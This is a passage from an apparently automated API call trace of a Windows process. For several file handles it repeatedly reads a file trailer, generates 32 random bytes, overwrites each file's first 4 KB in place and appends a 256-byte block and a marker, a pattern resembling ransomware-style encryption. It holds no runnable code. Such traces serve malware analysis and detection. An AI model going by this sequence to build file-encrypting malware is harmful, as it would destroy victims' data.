dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.632] GetProcessHeap () returned 0x4f10000 [0082.632] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.633] GetProcessHeap () returned 0x4f10000 [0082.633] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.633] GetProcessHeap () returned 0x4f10000 [0082.633] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.633] GetProcessHeap () returned 0x4f10000 [0082.633] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.633] GetProcessHeap () returned 0x4f10000 [0082.633] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.633] GetProcessHeap () returned 0x4f10000 [0082.633] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.633] GetProcessHeap () returned 0x4f10000 [0082.633] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.633] GetProcessHeap () returned 0x4f10000 [0082.633] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.633] GetProcessHeap () returned 0x4f10000 [0082.633] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.633] GetProcessHeap () returned 0x4f10000 [0082.633] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.633] GetProcessHeap () returned 0x4f10000 [0082.633] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.633] GetProcessHeap () returned 0x4f10000 [0082.633] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.633] SetFilePointerEx (in: hFile=0x8d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.633] WriteFile (in: hFile=0x8d4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.633] WriteFile (in: hFile=0x8d4, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.634] GetProcessHeap () returned 0x4f10000 [0082.634] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.634] GetProcessHeap () returned 0x4f10000 [0082.634] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.634] GetProcessHeap () returned 0x4f10000 [0082.634] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.634] CloseHandle (hObject=0x8d4) returned 1 [0082.635] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 86 [0082.635] SetFilePointerEx (in: hFile=0x8d8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.635] ReadFile (in: hFile=0x8d8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.635] SetFilePointerEx (in: hFile=0x8d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.635] GetProcessHeap () returned 0x4f10000 [0082.635] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.635] GetProcessHeap () returned 0x4f10000 [0082.635] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.635] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.635] GetProcessHeap () returned 0x4f10000 [0082.635] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.635] ReadFile (in: hFile=0x8d8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.682] SetFilePointerEx (in: hFile=0x8d8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.683] WriteFile (in: hFile=0x8d8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.683] GetProcessHeap () returned 0x4f10000 [0082.683] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.684] GetProcessHeap () returned 0x4f10000 [0082.684] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.685] GetProcessHeap () returned 0x4f10000 [0082.685] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.686] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.686] GetProcessHeap () returned 0x4f10000 [0082.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.687] GetProcessHeap () returned 0x4f10000 [0082.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.687] GetProcessHeap () returned 0x4f10000 [0082.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.687] GetProcessHeap () returned 0x4f10000 [0082.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.687] GetProcessHeap () returned 0x4f10000 [0082.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.687] GetProcessHeap () returned 0x4f10000 [0082.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.687] GetProcessHeap () returned 0x4f10000 [0082.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.687] GetProcessHeap () returned 0x4f10000 [0082.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.687] GetProcessHeap () returned 0x4f10000 [0082.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.687] GetProcessHeap () returned 0x4f10000 [0082.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.687] GetProcessHeap () returned 0x4f10000 [0082.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.687] GetProcessHeap () returned 0x4f10000 [0082.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.687] GetProcessHeap () returned 0x4f10000 [0082.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.687] SetFilePointerEx (in: hFile=0x8d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.687] WriteFile (in: hFile=0x8d8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.688] WriteFile (in: hFile=0x8d8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.688] GetProcessHeap () returned 0x4f10000 [0082.688] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.688] GetProcessHeap () returned 0x4f10000 [0082.688] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.688] GetProcessHeap () returned 0x4f10000 [0082.688] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.688] CloseHandle (hObject=0x8d8) returned 1 [0082.689] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 87 [0082.689] SetFilePointerEx (in: hFile=0x8dc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.689] ReadFile (in: hFile=0x8dc, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.689] SetFilePointerEx (in: hFile=0x8dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.689] GetProcessHeap () returned 0x4f10000 [0082.689] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.689] GetProcessHeap () returned 0x4f10000 [0082.689] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.689] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.690] GetProcessHeap () returned 0x4f10000 [0082.690] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.690] ReadFile (in: hFile=0x8dc, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.737] SetFilePointerEx (in: hFile=0x8dc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.737] WriteFile (in: hFile=0x8dc, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.737] GetProcessHeap () returned 0x4f10000 [0082.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.737] GetProcessHeap () returned 0x4f10000 [0082.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.737] GetProcessHeap () returned 0x4f10000 [0082.737] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.737] GetProcessHeap () returned 0x4f10000 [0082.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.737] GetProcessHeap () returned 0x4f10000 [0082.737] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.737] GetProcessHeap () returned 0x4f10000 [0082.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.737] GetProcessHeap () returned 0x4f10000 [0082.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.737] GetProcessHeap () returned 0x4f10000 [0082.737] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.737] GetProcessHeap () returned 0x4f10000 [0082.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.737] GetProcessHeap () returned 0x4f10000 [0082.737] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.737] GetProcessHeap () returned 0x4f10000 [0082.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.738] GetProcessHeap () returned 0x4f10000 